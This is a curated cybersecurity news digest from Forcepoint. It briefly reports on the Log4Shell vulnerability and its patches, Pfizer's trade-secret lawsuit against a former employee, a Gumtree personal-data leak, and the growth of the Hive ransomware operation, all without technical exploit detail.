Forcepoint Security News: Log4Shell Vulnerability, Pfizer Trade Secrets Exfiltration, Classifieds Site Leaked Personal Info via the F12 Key, and Hive Ransomware Enters Big League
Editor's Note: Welcome to this issue of Forcepoint Security News. It's curated news meant to provide a quick look at what's happening around the cybersecurity industry.
Log4Shell Vulnerability Lets Attackers Execute Code on Millions of Machines
The recently discovered Log4Shell vulnerability in the popular open source Log4j logging software lets an attacker gain access to a vulnerable system by sending a specially crafted text string to the system. That text string eventually gets logged by Log4j but is also interpreted as code to execute. This in turn is used to download malware and execute malware that can run cryptocurrency mining software, release sensitive data, be part of a DDoS attack on other systems, or execute ransomware. The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages. The problem is exasperated by the ubiquity of Java code and the use of Log4j for monitoring and troubleshooting that code. The vulnerability is now being used by state-backed hackers all over the world.
The Initial Log4j Vulnerability Patch Is Itself Vulnerable
Researchers are reporting that there are at least two vulnerabilities in the initial Log4j vulnerability patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets. The researchers are urging organizations to install a new patch, released as version 2.16.0, as soon as possible to fix the vulnerability, which is tracked as CVE-2021-45046. Researchers said the earlier fix “was incomplete in certain non-default configurations” and made it possible for attackers to launch denial-of-service attacks from the affected systems. Version 2.16.0 "fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default."
Pfizer Alleges Worker Exfiltrated Company Trade Secrets
Pfizer has filed legal action against a former employee, alleging she uploaded to personal devices and accounts thousands of files containing confidential information and trade secrets pertaining to the company's vaccines and medications, including its COVID-19 vaccine, to potentially provide to her new employer, a competing biopharmaceutical company. In its complaint, Pfizer says that as part of its tracking of employee activity on company devices, the company's security team discovered on Oct. 29 that, between Oct. 23 and Oct. 26, while the employee was "out of office," she transferred over 12,000 files from her Pfizer laptop to an online Google Drive account.
Gumtree Classifieds Site Leaked Personal Info via the F12 Key
British classifieds site Gumtree.com suffered a data leak after a security researcher revealed that he could access sensitive personally identifiable data of advertisers simply by pressing F12 on the keyboard and revealing the website's source code. Pen Test Partners security researcher Alan Monie discovered that he could see PII of advertisers that included full name, email address, account registration data, and postcode or GPS coordinates. These leaked users could be targeted by phishing or social engineering attacks that use this information to try and harvest more sensitive information. The vulnerability was not completely resolved until almost a month after being discovered.
Hive Ransomware Enters Big League with Hundreds Breached in Four Months
The Hive ransomware as a service gang is more active and aggressive than its leak site shows, with affiliates attacking an average of three companies every day since the operation became known in late June. Security researchers gleaning information straight from Hive’s administrator panel found that affiliates had breached more than 350 organizations over four months. The gang’s data leak site currently lists only 55 companies that did not pay the ransom, suggesting that many Hive ransomware victims paid the ransom. But as chat messages between victims and affiliates show, even those that paid the ransom were unable to recover their servers with the provided decryption software.